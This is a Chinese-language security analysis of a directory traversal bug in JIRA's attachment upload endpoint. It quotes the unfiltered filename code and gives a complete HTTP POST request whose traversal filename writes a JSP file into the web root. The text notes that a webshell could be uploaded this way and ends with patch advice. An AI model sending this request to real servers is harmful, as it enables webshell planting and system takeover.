开源BUG跟踪平台JIRA目录遍历漏洞分析

　　在第31行，代码将上传的文件移动到一个临时目录中，filename的值没有任何过滤，该值由多个部分组合而成，因此可以通过客户端控制。
　　31 tempAttachmentFile = new File(tmpDir， uniqueId + "_" +
　　fileName);
　　来源：
　　13 [...]createTemporaryAttachment(filePart.getName()，
　　filePart.getContentType()， filePart.getInputStream());
　　漏洞利用
　　为了使文件上传到附件目录之外，可以用一个经典的目录遍历模式遍历到公共web目录的根目录（/atlassian-jira/）。在之前示例代码可以看到其并没有对文件内容进行过滤，因此可以上传一个JSP shell来获取系统权限。
POST
/rest/collectors/1.0/tempattachment/multipart/2c1ce5fa  HTTP/1.1
Host:
hackme.atlassian.net
Cookie:
atlassian.xsrf.token=BQ79-A85Q-7DOM-UMFN|e98231aaaef98a0d9dc7c52e87f4e84cf9cd3085
Connection:
keep-alive
Content-Type:
multipart/form-data;
boundary=---------------------------16266315542468
Content-Length:
345
-----------------------------16266315542468
Content-Disposition:
form-data; name="screenshot";
filename="/../../../atlassian-jira/hello.jsp"
Content-Type:
text/plain
<h1>
Hello
world!</h1>
-----------------------------16266315542468
　　请求中的文件名"/../../../atlassian-jira/hello.jsp"会被连结到uniqueid从而代替临时目录路径。
　　在Windows系统上：
　　C:Program
　　FilesAtlassianApplication
　　DataJIRAcaches mp_attachments6177763437089900999_/../../../atlassian-jira/hello.jsp
　　在Linux系统上：
　　/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_/../../../atlassian-jira/hello.jsp
　　在windows系统上路径会被规范化为"C:Program
　　FilesAtlassianApplication DataJIRAatlassian-jirahello.jsp"，之后文件被写入。换句话说，Linux系统会使用整个完整的路径，并会发现目录"/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_"根据不存在，因此无法利用。
　　这里可以将上传的文件替换为一个webshell。
　　漏洞修补
　　如果读者维护着一款Jira实例，应该已经接收到更新提示了，如果没有，请参考文章开头提到的公告。